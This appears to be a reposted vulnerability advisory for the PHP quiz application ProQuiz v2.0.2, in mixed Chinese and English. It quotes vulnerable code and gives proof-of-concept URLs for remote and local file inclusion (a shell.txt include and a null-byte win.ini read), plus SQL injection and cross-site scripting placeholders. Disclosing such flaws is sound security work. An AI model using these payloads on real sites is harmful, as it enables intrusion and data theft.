标题: ProQuiz v2.0.2 - Multiple Vulnerabilities 作者: L0n3ly-H34rT http://www.2cto.com/ l0n3ly_h34rt@hotmail.com 程序官网: http://proquiz.softon.org/ 下载 地址: http://code.google.com/p/proquiz/downloads/list 测试平台: Linux /Windows 1远程文件包含 : * In File (my_account.php) in line 114 & 115 : if($_GET['action']=='getpage' && !empty($_GET['page'])){ @include_once($_GET['page'].'.php'); 测试证明 First register and login in your panel and paste that's url e.g. : http://www.2cto.com /full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt? *注释 : 需要 allow_url_include=On ----------------------------------------------------------------------- 2 本地文件包含缺陷 : * In File (my_account.php) in line 114 & 115 : if($_GET['action']=='getpage' && !empty($_GET['page'])){ @include_once($_GET['page'].'.php'); * P.O.C : First register and login in your panel and paste that's url e.g. : http://www.2cto.com /full/my_account.php?action=getpage&page= windows /win.ini%00.jpg *注释 : 同样需要 magic_quotes_gpc = Off --------------------------------------------------------------------- 3- 远程SQL注射&盲注 * In Two Files : A- First ( answers.php ) in line 55 : <?php echo $_GET['instid']; ?> B- Second ( functions.php ) In : $_POST['email'] $_POST['username'] *测试证明: A- First : http://www.2cto.com /full/answers.php?action=answers&instid=[SQL] B- Second : About Email : In URL: http://127.0.0.1/full/functions.php?action=recoverpass Inject Here In POST Method : email=[SQL] About Username : In URL: http://127.0.0.1/full/functions.php?action=edit_profile&type=username Inject Here In POST Method : username=[SQL] ------------------------------------------------------------------------------------- 4 - Cross Site Scripting : e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS] ----------------------------------------------------------------------------------- # Greetz to my friendz
查看更多关于ProQuiz v2.0.2多重缺陷及修复 - 网站安全 - 自学ph的详细内容...